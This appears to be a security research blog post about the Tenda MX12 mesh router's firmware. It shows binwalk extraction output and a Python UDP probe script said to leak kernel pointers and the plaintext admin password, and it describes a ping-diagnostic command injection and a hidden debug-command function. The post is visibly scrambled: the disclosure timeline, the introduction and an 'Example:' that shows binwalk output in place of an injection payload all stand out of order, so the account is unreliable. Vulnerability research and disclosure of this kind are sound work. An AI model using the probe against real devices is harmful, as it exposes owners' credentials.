Skip to main content

Using a simple Python script, we triggered a crash dump:

Disclosure timeline: Reported to Tenda Security (security@tenda.com.cn) on Jan 12, 2026 – no acknowledgment as of April 17, 2026.

But beneath the sleek white plastic lies a firmware ecosystem that raises serious red flags. After extracting and reverse-engineering the latest firmware (v1.0.0.24 and v1.0.0.30), we found a labyrinth of debug commands, hardcoded credentials, and deprecated Linux kernels. The MX12 is powered by a Realtek RTL8198D (dual-core ARM Cortex-A7) with 128MB of flash and 256MB of RAM. Tenda distributes the firmware as a .bin file wrapped in a proprietary TRX header with a custom checksum.

In the crowded market of affordable WiFi 6 mesh systems, the Tenda MX12 (often bundled as the "Nova" series) is a bestseller on Amazon and AliExpress. Priced aggressively against the Eero 6 and Deco X20, it promises AX3000 speeds and seamless roaming.

An authenticated attacker (or any user on the LAN if the session check is bypassed) can inject arbitrary commands via the ping diagnostic tool. Example:

# Using binwalk to carve the squashfs $ binwalk -Me Tenda_MX12_V1.0.0.24_EN.bin 256 0x100 TRX firmware header, image size: 14876672 bytes 512 0x200 LZMA compressed data 1456128 0x163800 Squashfs filesystem, little endian, version 4.0

import socket msg = bytes.fromhex('AA BB CC DD 01 00 00 00') # Magic debug probe sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(msg, ('192.168.5.1', 7329)) data, addr = sock.recvfrom(4096) print(data.hex()) Kernel pointers, heap layout, and a plaintext print of the admin password if enable_debug=1 is set in NVRAM. Backdoor Analysis: The system Call in libhttpd.so The web server binary ( /bin/httpd ) loads a custom library libhttpd.so . Inside, we found an exposed function do_debug_cmd() that is never called by the official web UI.